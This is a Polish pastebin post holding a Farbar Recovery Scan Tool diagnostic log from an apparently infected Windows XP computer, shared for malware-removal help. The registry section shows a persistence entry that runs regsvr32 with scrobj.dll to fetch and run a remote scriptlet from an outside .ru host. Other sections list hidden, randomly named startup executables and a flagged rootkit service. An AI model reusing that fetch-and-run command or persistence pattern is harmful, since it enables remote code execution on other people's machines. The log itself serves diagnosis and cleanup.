wklejto.pl

Dodane przez: ~Anonim (2019-07-13 20:59) -> text
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.
43.
44.
45.
46.
47.
48.
49.
50.
51.
52.
53.
54.
55.
56.
57.
58.
59.
60.
61.
62.
63.
64.
65.
66.
67.
68.
69.
70.
71.
72.
73.
74.
75.
76.
77.
78.
79.
80.
81.
82.
83.
84.
85.
86.
87.
88.
89.
90.
91.
92.
93.
94.
95.
96.
97.
98.
99.
100.
101.
102.
103.
104.
105.
106.
107.
108.
109.
110.
111.
112.
113.
114.
115.
116.
117.
118.
119.
120.
121.
122.
123.
124.
125.
126.
127.
128.
129.
130.
131.
132.
133.
134.
135.
136.
137.
138.
139.
140.
141.
142.
143.
144.
145.
146.
147.
148.
149.
150.
151.
152.
153.
154.
155.
156.
157.
158.
159.
160.
161.
162.
163.
164.
165.
166.
167.
168.
169.
170.
171.
172.
173.
174.
175.
176.
177.
178.
179.
180.
181.
182.
183.
184.
185.
186.
187.
188.
189.
190.
191.
192.
193.
194.
195.
196.
197.
198.
199.
200.
201.
202.
203.
204.
205.
206.
207.
208.
209.
210.
211.
212.
213.
214.
215.
216.
217.
218.
219.
220.
221.
222.
223.
224.
225.
226.
227.
228.
229.
230.
231.
232.
233.
234.
235.
236.
237.
238.
239.
240.
241.
242.
243.
244.
245.
246.
247.
Rezultaty skanowania Farbar Recovery Scan Tool (FRST) (x86) Wersja: 13-07-2019
Uruchomiony przez Admin (administrator)  RENIA (ASUSTeK Computer Inc.  K50C) (13-07-2019 20:50:07)
Uruchomiony z E:\Programy
Załadowane profile: Admin (Dostępne profile: Admin)
Platform: Microsoft Windows XP Home Edition Dodatek Service Pack 3 (X86) Język: Polski
Internet Explorer Wersja 8 (Domyślna przeglądarka: FF)
Tryb startu: Normal
Instrukcja obsługi Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
 
==================== Procesy (filtrowane) =================
 
(Załączenie wejścia w fixlist spowoduje zamknięcie procesu. Powiązany plik nie zostanie przeniesiony.)
 
() C:\Program Files\COMODO\COMODO Internet Security\cavwp.exe
() C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe
() C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe
(Comodo Security Solutions, Inc. -> COMODO) C:\Program Files\COMODO\Internet Security Essentials\isesrv.exe
(Comodo Security Solutions, Inc. -> COMODO) C:\Program Files\COMODO\Internet Security Essentials\vkise.exe
(Microsoft Windows Component Publisher -> Microsoft Corporation) C:\WINDOWS\system32\alg.exe
(Microsoft Windows Component Publisher -> Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
(Microsoft Windows Component Publisher -> Microsoft Corporation) C:\WINDOWS\system32\rundll32.exe
(Microsoft Windows Component Publisher -> Microsoft Corporation) C:\WINDOWS\system32\wscntfy.exe
(Microsoft Windows Hardware Compatibility Publisher -> Realtek Semiconductor Corp.) C:\WINDOWS\RTHDCPL.EXE
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\plugin-container.exe
(Silicon Integrated Systems Corporation) [Brak podpisu cyfrowego] C:\WINDOWS\system32\sistray.exe
 
==================== Rejestr (filtrowane) ===========================
 
(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci. Powiązany plik nie zostanie przeniesiony.)
 
HKLM\...\Run: [SiSPower] => C:\WINDOWS\system32\SiSPower.dll [53248 2009-04-01] (Silicon Integrated Systems Corporation) [Brak podpisu cyfrowego]
HKLM\...\Run: [RTHDCPL] => C:\WINDOWS\RTHDCPL.EXE [17567744 2009-03-27] (Microsoft Windows Hardware Compatibility Publisher -> Realtek Semiconductor Corp.)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1022152 2014-12-19] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [IseUI] => C:\Program Files\COMODO\Internet Security Essentials\vkise.exe [4187856 2019-01-29] (Comodo Security Solutions, Inc. -> COMODO)
HKLM\...\RunOnce: [] => [X]
Winlogon\Notify\Antiwpa: C:\WINDOWS\system32\antiwpa.dll [2008-06-19] ()
HKU\S-1-5-21-117609710-484763869-1547161642-1004\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.aserdefa.ru/restore.xml scrobj.dll <==== UWAGA
HKU\S-1-5-21-117609710-484763869-1547161642-1004\...\RunOnce: [FlashPlayerUpdate] => C:\WINDOWS\system32\Macromed\Flash\FlashUtil32_32_0_0_156_Plugin.exe [1457664 2019-03-27] (Adobe Systems Incorporated -> Adobe Systems Incorporated) [Brak podpisu cyfrowego]
HKLM\...\Drivers32: [msacm.trspch] => C:\WINDOWS\system32\tssoft32.acm [8192 2017-07-29] (Microsoft Windows Component Publisher -> DSP GROUP, INC.)
HKLM\...\Drivers32: [vidc.I420] => C:\WINDOWS\system32\msh263.drv [294912 2017-07-29] (Microsoft Windows Component Publisher -> Microsoft Corporation)
HKLM\...\Drivers32: [vidc.iv31] => C:\WINDOWS\system32\ir32_32.dll [199168 2017-07-29] (Microsoft Windows Component Publisher -> )
HKLM\...\Drivers32: [vidc.iv32] => C:\WINDOWS\system32\ir32_32.dll [199168 2017-07-29] (Microsoft Windows Component Publisher -> )
HKLM\...\Drivers32: [vidc.iv41] => C:\WINDOWS\system32\ir41_32.ax [848384 2017-07-29] (Microsoft Windows Component Publisher -> Intel Corporation)
HKLM\...\Drivers32: [msacm.msg723] => C:\WINDOWS\system32\msg723.acm [118784 2017-07-29] (Microsoft Windows Component Publisher -> Microsoft Corporation)
HKLM\...\Drivers32: [vidc.M263] => C:\WINDOWS\system32\msh263.drv [294912 2017-07-29] (Microsoft Windows Component Publisher -> Microsoft Corporation)
HKLM\...\Drivers32: [vidc.M261] => C:\WINDOWS\system32\msh261.drv [188416 2017-07-29] (Microsoft Windows Component Publisher -> Microsoft Corporation)
HKLM\...\Drivers32: [msacm.msaudio1] => C:\WINDOWS\system32\msaud32.acm [282654 2017-07-29] (Microsoft Windows Component Publisher -> Microsoft Corporation)
HKLM\...\Drivers32: [msacm.sl_anet] => C:\WINDOWS\system32\sl_anet.acm [86016 2017-07-29] (Microsoft Windows Component Publisher -> Sipro Lab Telecom Inc.)
HKLM\...\Drivers32: [msacm.iac2] => C:\WINDOWS\system32\iac25_32.ax [199680 2017-07-29] (Microsoft Windows Component Publisher -> Intel Corporation)
HKLM\...\Drivers32: [vidc.iv50] => C:\WINDOWS\system32\ir50_32.dll [755200 2017-07-29] (Microsoft Windows Component Publisher -> Intel Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [<{12d0ed0d-0ee0-4f90-8827-78cefb8f4988}] -> C:\WINDOWS\system32\ieudinit.exe [2017-07-29] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}] -> C:\WINDOWS\inf\unregmp2.exe [2017-07-29] (Microsoft Windows Component Publisher -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [>{881dd1c5-3dcf-431b-b061-f3f88e8be88a}] -> C:\WINDOWS\system32\shmgrate.exe [2017-07-29] (Microsoft Windows Component Publisher -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{2179C5D3-EBFF-11CF-B6FD-00AA00B4E220}] -> 
HKLM\Software\Microsoft\Active Setup\Installed Components: [{22d6f312-b0f6-11d0-94ab-0080c74c7e95}] -> 
HKLM\Software\Microsoft\Active Setup\Installed Components: [{44BBA840-CC51-11CF-AAFA-00AA00B6015C}] -> C:\Program Files\Outlook Express\setup50.exe [2017-07-29] (Microsoft Windows Component Publisher -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{44BBA842-CC51-11CF-AAFA-00AA00B6015B}] -> C:\WINDOWS\system32\advpack.dll [2017-07-29] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{5945c046-1e7d-11d1-bc44-00c04fd912be}] -> C:\WINDOWS\system32\advpack.dll [2017-07-29] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{6BF52A52-394A-11d3-B153-00C04F79FAA6}] -> C:\WINDOWS\system32\advpack.dll [2017-07-29] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{7790769C-0471-11d2-AF11-00C04FA35D02}] -> C:\Program Files\Outlook Express\setup50.exe [2017-07-29] (Microsoft Windows Component Publisher -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\49.0.2623.112\Installer\chrmstp.exe [2018-06-30] (Google Inc -> Google Inc.)
HKLM\Software\...\Winlogon\GPExtensions: [{C631DF4C-088F-4156-B058-4375F0853CD8}] -> C:\WINDOWS\System32\cscui.dll [2017-07-29] (Microsoft Windows Component Publisher -> Microsoft Corporation)
HKLM\Software\...\Winlogon\GPExtensions: [{c6dc5466-785a-11d2-84d0-00c04fb169f7}] -> appmgmts.dll
Startup: C:\Documents and Settings\Admin\Menu Start\Programy\Autostart\3.lnk [2019-07-13]
ShortcutTarget: 3.lnk -> C:\Documents and Settings\Admin\Dane aplikacji\eek9h6eCbi.exe () [Brak podpisu cyfrowego]
Startup: C:\Documents and Settings\Admin\Menu Start\Programy\Autostart\e.lnk [2019-07-13]
ShortcutTarget: e.lnk -> C:\Documents and Settings\Admin\Dane aplikacji\eeBj8gEdkr.exe () [Brak podpisu cyfrowego]
Startup: C:\Documents and Settings\Admin\Menu Start\Programy\Autostart\N.lnk [2019-07-13]
ShortcutTarget: N.lnk -> C:\Documents and Settings\Admin\Dane aplikacji\eeLtIqFnCk.exe () [Brak podpisu cyfrowego]
Startup: C:\Documents and Settings\Admin\Menu Start\Programy\Autostart\V.lnk [2019-07-13]
ShortcutTarget: V.lnk -> C:\Documents and Settings\Admin\Dane aplikacji\eewUtRqOnL.exe () [Brak podpisu cyfrowego]
Startup: C:\Documents and Settings\Admin\Menu Start\Programy\Autostart\w.lnk [2019-07-13]
ShortcutTarget: w.lnk -> C:\Documents and Settings\Admin\Dane aplikacji\eeRzXwUt07.exe () [Brak podpisu cyfrowego]
Startup: C:\Documents and Settings\Admin\Menu Start\Programy\Autostart\Y.lnk [2019-07-13]
ShortcutTarget: Y.lnk -> C:\Documents and Settings\Admin\Dane aplikacji\eea8X5U2Rz.exe () [Brak podpisu cyfrowego]
Startup: C:\Documents and Settings\All Users\Menu Start\Programy\Autostart\McAfee Security Scan Plus.lnk [2018-01-18]
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.500\SSScheduler.exe (McAfee, Inc. -> McAfee, Inc.)
Startup: C:\Documents and Settings\All Users\Menu Start\Programy\Autostart\Utility Tray.lnk [2017-08-03]
ShortcutTarget: Utility Tray.lnk -> C:\WINDOWS\system32\sistray.exe (Silicon Integrated Systems Corporation) [Brak podpisu cyfrowego]
 
(Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.)
 
Task: C:\WINDOWS\Tasks\Adobe Flash Player NPAPI Notifier.job => C:\WINDOWS\system32\Macromed\Flash\FlashUtil32_32_0_0_156_Plugin.exe
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\CIS_{81EFDD93-DBBE-415B-BE6E-49B9664E3E82}.job => C:\Documents and Settings\All Users\Dane aplikacji\cis2B.exe
Task: C:\WINDOWS\Tasks\COMODO CMC {06A09C0F-DD9C-4191-A670-71115CD78627}.job => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe
Task: C:\WINDOWS\Tasks\COMODO Scan {F140D794-60B6-4F00-9235-D6457AA25B22}.job => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe
Task: C:\WINDOWS\Tasks\COMODO Signature Update {B9D5C6F9-17D2-4917-8BD0-614BAA1C6A59}.job => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe
Task: C:\WINDOWS\Tasks\COMODO Telemetry {18AD3DFA-30C0-4B5F-84F7-F1870B1A4921}.job => C:\Program Files\COMODO\COMODO Internet Security\cis.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\Powiadomienie o zakończeniu obsługi systemu Microsoft Windows XP — co miesiąc.job => C:\WINDOWS\system32\xp_eos.exe
Task: C:\WINDOWS\Tasks\Powiadomienie o zakończeniu obsługi systemu Microsoft Windows XP — logowanie.job => C:\WINDOWS\system32\xp_eos.exe
 
==================== Internet (filtrowane) ====================
 
(Załączenie wejścia w fixlist, w przypadku gdy jest to obiekt rejestru, spowoduje usunięcie go z rejestru lub przywrócenie jego domyślnej postaci.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{E7068CCB-41F4-439F-803C-E7A13BB7D862}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{ECEA57D6-789E-414E-B18D-F430172FAB71}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
HKU\S-1-5-21-117609710-484763869-1547161642-1004\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
Handler: http\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL [2002-05-23] (Microsoft Corporation) [Brak podpisu cyfrowego]
Handler: http\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL [2002-05-23] (Microsoft Corporation) [Brak podpisu cyfrowego]
Handler: https\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL [2002-05-23] (Microsoft Corporation) [Brak podpisu cyfrowego]
Handler: https\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL [2002-05-23] (Microsoft Corporation) [Brak podpisu cyfrowego]
Handler: ipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL [2002-05-23] (Microsoft Corporation) [Brak podpisu cyfrowego]
Handler: msdaipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL [2002-05-23] (Microsoft Corporation) [Brak podpisu cyfrowego]
Handler: msdaipp\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL [2002-05-23] (Microsoft Corporation) [Brak podpisu cyfrowego]
 
FireFox:
========
FF DefaultProfile: 2zxvy1j5.default
FF ProfilePath: C:\Documents and Settings\Admin\Dane aplikacji\Mozilla\Firefox\Profiles\2zxvy1j5.default [2019-07-13]
FF Homepage: C:\Documents and Settings\Admin\Dane aplikacji\Mozilla\Firefox\Profiles\2zxvy1j5.default -> about:home
FF Extension: (Hotfix for Firefox bug 1548973 (armagaddon 2.0) mitigation) - C:\Documents and Settings\Admin\Dane aplikacji\Mozilla\Firefox\Profiles\2zxvy1j5.default\features\{d81ffef7-010d-4c19-bfef-7d3cb95fdd04}\hotfix-bug-1548973@mozilla.org.xpi [2019-07-13] [Przestarzałe]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF32_32_0_0_156.dll [2019-03-27] (Adobe Systems Incorporated -> ) [Brak podpisu cyfrowego]
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-07-13] (Google Inc -> Google LLC)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-07-13] (Google Inc -> Google LLC)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2014-08-05] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
 
Chrome: 
=======
CHR Profile: C:\Documents and Settings\Admin\Ustawienia lokalne\Dane aplikacji\Google\Chrome\User Data\Default [2019-05-22]
CHR Extension: (Prezentacje) - C:\Documents and Settings\Admin\Ustawienia lokalne\Dane aplikacji\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-06-30]
CHR Extension: (Dokumenty) - C:\Documents and Settings\Admin\Ustawienia lokalne\Dane aplikacji\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-06-30]
CHR Extension: (Dysk Google) - C:\Documents and Settings\Admin\Ustawienia lokalne\Dane aplikacji\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-06-30]
CHR Extension: (YouTube) - C:\Documents and Settings\Admin\Ustawienia lokalne\Dane aplikacji\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-06-30]
CHR Extension: (Arkusze) - C:\Documents and Settings\Admin\Ustawienia lokalne\Dane aplikacji\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-06-30]
CHR Extension: (Dokumenty Google offline) - C:\Documents and Settings\Admin\Ustawienia lokalne\Dane aplikacji\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-26]
CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Documents and Settings\Admin\Ustawienia lokalne\Dane aplikacji\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-30]
CHR Extension: (Gmail) - C:\Documents and Settings\Admin\Ustawienia lokalne\Dane aplikacji\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-06-30]
 
==================== Usługi (filtrowane) ====================
 
(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)
 
HKLM\SYSTEM\CurrentControlSet\Services\cmdGuard <==== UWAGA (Rootkit!)
 
S3 AdobeFlashPlayerUpdateSvc; C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2019-04-29] (Adobe Inc. -> Adobe) [Brak podpisu cyfrowego]
R2 isesrv; C:\Program Files\COMODO\Internet Security Essentials\isesrv.exe [1044176 2019-01-29] (Comodo Security Solutions, Inc. -> COMODO)
S3 SwPrv; C:\WINDOWS\system32\dllhost.exe /Processid:{A324AC2F-26D9-496B-ACC2-FFE2A1B67F07} [5120 2017-07-29] (Microsoft Windows Component Publisher -> Microsoft Corporation)
S2 TeamViewer; C:\Program Files\TeamViewer\TeamViewer_Service.exe [10803440 2018-09-28] (TeamViewer GmbH -> TeamViewer GmbH)
 
===================== Sterowniki (filtrowane) ======================
 
(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)
 
S3 Ambfilt; C:\WINDOWS\System32\drivers\Ambfilt.sys [1684736 2008-08-05] (Microsoft Windows Hardware Compatibility Publisher -> Creative)
R3 AR5416; C:\WINDOWS\System32\DRIVERS\athw.sys [1570240 2009-06-03] (Microsoft Windows Hardware Compatibility Publisher -> Atheros Communications, Inc.)
S3 CCDECODE; C:\WINDOWS\System32\DRIVERS\CCDECODE.sys [17024 2008-04-14] (Microsoft Windows Component Publisher -> Microsoft Corporation)
R3 HDAudBus; C:\WINDOWS\System32\DRIVERS\HDAudBus.sys [144384 2017-07-29] (Microsoft Windows Component Publisher -> Windows (R) Server 2003 DDK provider)
R3 IntcAzAudAddService; C:\WINDOWS\System32\drivers\RtkHDAud.sys [5063168 2009-03-30] (Microsoft Windows Hardware Compatibility Publisher -> Realtek Semiconductor Corp.)
R1 isedrv; C:\WINDOWS\system32\drivers\isedrv.sys [34056 2019-01-29] (Comodo Security Solutions, Inc. -> COMODO)
S3 Monfilt; C:\WINDOWS\System32\drivers\Monfilt.sys [1389056 2006-01-04] (Microsoft Windows Hardware Compatibility Publisher -> Creative Technology Ltd.)
S3 NdisIP; C:\WINDOWS\System32\DRIVERS\NdisIP.sys [10880 2008-04-14] (Microsoft Windows Component Publisher -> Microsoft Corporation)
R3 Ptilink; C:\WINDOWS\System32\DRIVERS\ptilink.sys [17792 2017-07-29] (Microsoft Windows Component Publisher -> Parallel Technologies, Inc.)
R3 RTLE8023xp; C:\WINDOWS\System32\DRIVERS\Rtenicxp.sys [120064 2009-01-22] (Microsoft Windows Hardware Compatibility Publisher -> Realtek Semiconductor Corporation )
S3 Secdrv; C:\WINDOWS\System32\DRIVERS\secdrv.sys [20480 2017-07-29] (Microsoft Windows Component Publisher -> Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.)
R3 SiS315; C:\WINDOWS\System32\DRIVERS\sisgrp.sys [324608 2009-04-01] (Microsoft Windows Hardware Compatibility Publisher -> Silicon Integrated Systems Corporation)
R1 SiSkp; C:\WINDOWS\System32\DRIVERS\srvkp.sys [19200 2009-04-01] (Microsoft Windows Hardware Compatibility Publisher -> Silicon Integrated Systems Corporation)
R4 CmdAgent; Brak ImagePath
S4 IntelIde; Brak ImagePath
U1 WS2IFSL; Brak ImagePath
 
==================== NetSvcs (filtrowane) ===================
 
(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)
 
 
==================== Jeden miesiąc (utworzone) ========
 
(Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.)
 
2019-07-13 20:50 - 2019-07-13 20:50 - 000000000 ____D C:\FRST
2019-07-13 20:45 - 2019-07-13 20:45 - 000000484 _____ C:\WINDOWS\Tasks\CIS_{81EFDD93-DBBE-415B-BE6E-49B9664E3E82}.job
2019-07-13 20:45 - 2019-07-13 20:45 - 000000000 ____D C:\Program Files\UsbFix
2019-07-13 20:45 - 2019-07-04 21:25 - 000377216 _____ (COMODO) C:\Documents and Settings\All Users\Dane aplikacji\cmdres.dll
2019-07-13 20:45 - 2019-07-04 21:21 - 004753280 _____ (COMODO) C:\Documents and Settings\All Users\Dane aplikacji\cis2B.exe
2019-07-13 14:16 - 2019-07-13 18:17 - 003106508 _____ C:\Documents.nfo
2019-07-13 13:59 - 2019-07-13 20:40 - 000045886 _____ C:\WINDOWS\system32\Drivers\fvstore.dat
2019-07-13 13:59 - 2019-07-13 20:35 - 000000000 ___HD C:\VTRoot
2019-07-13 13:16 - 2019-07-13 20:45 - 000000440 _____ C:\WINDOWS\Tasks\COMODO Signature Update {B9D5C6F9-17D2-4917-8BD0-614BAA1C6A59}.job
2019-07-13 13:16 - 2019-07-13 20:45 - 000000440 _____ C:\WINDOWS\Tasks\COMODO Scan {F140D794-60B6-4F00-9235-D6457AA25B22}.job
2019-07-13 13:16 - 2019-07-13 20:45 - 000000440 _____ C:\WINDOWS\Tasks\COMODO CMC {06A09C0F-DD9C-4191-A670-71115CD78627}.job
2019-07-13 13:16 - 2019-07-13 20:45 - 000000342 _____ C:\WINDOWS\Tasks\COMODO Telemetry {18AD3DFA-30C0-4B5F-84F7-F1870B1A4921}.job
2019-07-13 13:16 - 2019-07-13 20:38 - 000283376 _____ C:\WINDOWS\system32\Drivers\sfi.dat
2019-07-13 13:14 - 2019-07-13 20:45 - 000065536 _____ C:\WINDOWS\system32\config\CIS Trac.evt
2019-07-13 13:14 - 2019-07-13 13:14 - 000065536 _____ C:\WINDOWS\system32\config\CIS CEF.evt
2019-07-13 13:14 - 2019-07-13 13:14 - 000008512 ____H C:\WINDOWS\system32\mlfcache.dat
2019-07-13 13:13 - 2019-07-13 20:45 - 000000000 ____D C:\Documents and Settings\All Users\Menu Start\Programy\COMODO
2019-07-13 13:13 - 2019-07-13 13:13 - 000000000 ____D C:\Program Files\COMODO
2019-07-13 13:13 - 2019-01-29 10:42 - 000205024 _____ (COMODO) C:\WINDOWS\system32\iseguard32.dll
2019-07-13 13:13 - 2019-01-29 10:40 - 000034056 _____ (COMODO) C:\WINDOWS\system32\Drivers\isedrv.sys
2019-07-13 13:10 - 2019-07-13 13:13 - 000000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\Comodo
2019-07-13 13:10 - 2019-07-13 13:10 - 000000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\Shared Space
2019-07-13 13:10 - 2019-07-13 13:10 - 000000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\Comodo Downloader
2019-07-13 12:34 - 2019-07-13 12:34 - 074220514 __RSH C:\Documents and Settings\Admin\Dane aplikacji\eeBj8gEdkr.exe
 
==================== Jeden miesiąc (zmodyfikowane) ========
 
(Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.)
 
2019-07-13 20:51 - 2017-08-03 19:56 - 000000000 ____D C:\Documents and Settings\Admin\Ustawienia lokalne\Temp
2019-07-13 20:45 - 2017-08-03 21:33 - 000000000 __RHD C:\Documents and Settings\All Users\Dane aplikacji
2019-07-13 20:45 - 2017-08-03 21:33 - 000000000 ____D C:\Documents and Settings\All Users\Pulpit
2019-07-13 20:30 - 2018-01-18 19:59 - 000000930 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2019-07-13 20:19 - 2018-06-30 17:22 - 000001032 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2019-07-13 20:19 - 2018-01-18 16:36 - 000000222 _____ C:\WINDOWS\Tasks\Powiadomienie o zakończeniu obsługi systemu Microsoft Windows XP — logowanie.job
2019-07-13 20:19 - 2017-08-03 21:21 - 000000000 ____D C:\WINDOWS\system32\Macromed
2019-07-13 20:18 - 2017-08-03 19:54 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2019-07-13 18:29 - 2017-08-03 19:56 - 000000188 ___SH C:\Documents and Settings\Admin\ntuser.ini
2019-07-13 18:29 - 2017-08-03 19:54 - 000032608 _____ C:\WINDOWS\SchedLgU.Txt
2019-07-13 18:16 - 2017-07-29 14:23 - 000002278 _____ C:\WINDOWS\system32\wpa.dbl
2019-07-13 18:15 - 2018-03-18 19:30 - 000000980 _____ C:\WINDOWS\Tasks\Adobe Flash Player NPAPI Notifier.job
2019-07-13 17:54 - 2018-06-30 17:23 - 000001036 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2019-07-13 13:25 - 2018-08-28 22:41 - 000000000 ____D C:\Program Files\TeamViewer
2019-07-13 13:13 - 2017-08-03 21:33 - 000000000 ___RD C:\Documents and Settings\All Users\Menu Start\Programy
2019-07-13 12:53 - 2017-08-03 19:56 - 000000000 ___HD C:\Documents and Settings\Admin\Ustawienia lokalne\Dane aplikacji
2019-07-13 12:37 - 2017-08-03 21:21 - 000000000 ____D C:\WINDOWS\pchealth
2019-07-13 12:34 - 2017-08-03 19:56 - 000000000 __RHD C:\Documents and Settings\Admin\Dane aplikacji
2019-07-13 12:31 - 2018-01-18 16:36 - 000000216 _____ C:\WINDOWS\Tasks\Powiadomienie o zakończeniu obsługi systemu Microsoft Windows XP — co miesiąc.job
 
==================== Pliki w katalogu głównym wybranych folderów ================
 
2018-10-20 12:03 - 2018-10-20 12:03 - 090944098 __RSH () C:\Documents and Settings\Admin\Dane aplikacji\eea8X5U2Rz.exe
2019-07-13 12:34 - 2019-07-13 12:34 - 074220514 __RSH () C:\Documents and Settings\Admin\Dane aplikacji\eeBj8gEdkr.exe
2018-08-24 22:34 - 2018-08-24 22:34 - 090273634 __RSH () C:\Documents and Settings\Admin\Dane aplikacji\eeHgEdBj8F.exe
2019-05-22 12:27 - 2019-05-22 12:27 - 082337506 __RSH () C:\Documents and Settings\Admin\Dane aplikacji\eek9h6eCbi.exe
2018-06-19 12:56 - 2018-06-19 12:56 - 099864034 __RSH () C:\Documents and Settings\Admin\Dane aplikacji\eeLtIqFnCk.exe
2019-02-05 20:33 - 2019-02-05 20:33 - 089873890 __RSH () C:\Documents and Settings\Admin\Dane aplikacji\eeQyNvKsHp.exe
2019-03-25 20:05 - 2019-03-25 20:05 - 095053282 __RSH () C:\Documents and Settings\Admin\Dane aplikacji\eeRzXwUt07.exe
2018-12-14 21:50 - 2018-12-14 21:50 - 093979618 __RSH () C:\Documents and Settings\Admin\Dane aplikacji\eeVuSrPov2.exe
2018-06-19 19:23 - 2018-06-19 19:23 - 073902562 __RSH () C:\Documents and Settings\Admin\Dane aplikacji\eewUtRqOnL.exe
2018-07-20 18:11 - 2018-07-20 18:11 - 000003584 _____ () C:\Documents and Settings\Admin\Ustawienia lokalne\Dane aplikacji\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
